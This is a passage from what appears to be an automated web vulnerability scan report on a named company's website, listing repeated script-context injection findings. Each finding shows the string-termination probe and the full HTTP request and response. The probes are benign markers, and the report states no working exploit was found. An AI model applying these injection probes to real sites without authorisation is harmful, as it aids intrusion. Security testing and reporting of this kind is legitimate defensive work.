This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/b8515'%3b1e90016a7f0/jquery+swfobject2+vzbar/site.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:00 GMT
Vary: *
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/templates/b8515';1e90016a7f0/jquery+swfobject2+vzbar/site.js'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1096. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52818"%3b7b3f28e7de6 was submitted in the REST URL parameter 2. This input was echoed as 52818";7b3f28e7de6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/52818"%3b7b3f28e7de6/jquery+swfobject2+vzbar/site.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:46 GMT
Vary: *
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/52818";7b3f28e7de6/jquery+swfobject2+vzbar/site.js";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.1097. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7787"%3bd002e688b25 was submitted in the REST URL parameter 4. This input was echoed as b7787";d002e688b25 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/js-+jquery/jquery+swfobject2+vzbar/b7787"%3bd002e688b25 HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:17 GMT
Vary: *
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40670
Date: Wed, 17 Nov 2010 00:04:17 GMT
Connection: close
Vary: Accept-Encoding
Expires: Mon, 16 Nov 2009 18:04:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/js-+jquery/jquery+swfobject2+vzbar/b7787";d002e688b25";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1098. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea925'%3b0a48eefe9de was submitted in the REST URL parameter 4. This input was echoed as ea925';0a48eefe9de in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/js-+jquery/jquery+swfobject2+vzbar/ea925'%3b0a48eefe9de HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:46 GMT
Vary: *
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/templates/js-+jquery/jquery+swfobject2+vzbar/ea925';0a48eefe9de'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1099. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab7ea'%3bd291df70e87 was submitted in the REST URL parameter 1. This input was echoed as ab7ea';d291df70e87 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templatesab7ea'%3bd291df70e87/vzbar/bert.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:09 GMT
Content-Type: text/html
Content-Length: 40630
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templatesab7ea';d291df70e87/vzbar/bert.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1100. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5aeb"%3b65e1fbc3483 was submitted in the REST URL parameter 1. This input was echoed as f5aeb";65e1fbc3483 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templatesf5aeb"%3b65e1fbc3483/vzbar/bert.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templatesf5aeb";65e1fbc3483/vzbar/bert.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1101. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4cbd"%3b63b84d41ee1 was submitted in the REST URL parameter 2. This input was echoed as f4cbd";63b84d41ee1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/vzbarf4cbd"%3b63b84d41ee1/bert.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:20 GMT
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/vzbarf4cbd";63b84d41ee1/bert.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCT
...[SNIP]...

1.1102. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f376'%3b2bcaed41004 was submitted in the REST URL parameter 2. This input was echoed as 2f376';2bcaed41004 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/vzbar2f376'%3b2bcaed41004/bert.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:31 GMT
Content-Type: text/html
Content-Length: 40630
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templates/vzbar2f376';2bcaed41004/bert.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1103. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62d6d"%3bac75314e6a7 was submitted in the REST URL parameter 3. This input was echoed as 62d6d";ac75314e6a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/vzbar/bert.xml62d6d"%3bac75314e6a7 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/vzbar/bert.xml62d6d";ac75314e6a7";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1104. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 587d9'%3bf785c3b4b56 was submitted in the REST URL parameter 3. This input was echoed as 587d9';f785c3b4b56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/vzbar/bert.xml587d9'%3bf785c3b4b56 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/templates/vzbar/bert.xml587d9';f785c3b4b56'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1105. http://www.verizonbusiness.com/terms/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /terms/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eceaa"%3b8d8c1449d07 was submitted in the REST URL parameter 1. This input was echoed as eceaa";8d8c1449d07 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /termseceaa"%3b8d8c1449d07/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40610
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/termseceaa";8d8c1449d07/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1106. http://www.verizonbusiness.com/terms/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /terms/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79116'%3b3d322ec6d06 was submitted in the REST URL parameter 1. This input was echoed as 79116';3d322ec6d06 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms79116'%3b3d322ec6d06/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:57 GMT
Content-Type: text/html
Content-Length: 40610
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/terms79116';3d322ec6d06/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1107. http://www.verizonbusiness.com/thinkforward/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /thinkforward/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9649b'%3b98d581e15b was submitted in the REST URL parameter 1. This input was echoed as 9649b';98d581e15b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9649b'%3b98d581e15b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/9649b';98d581e15b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1108. http://www.verizonbusiness.com/thinkforward/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
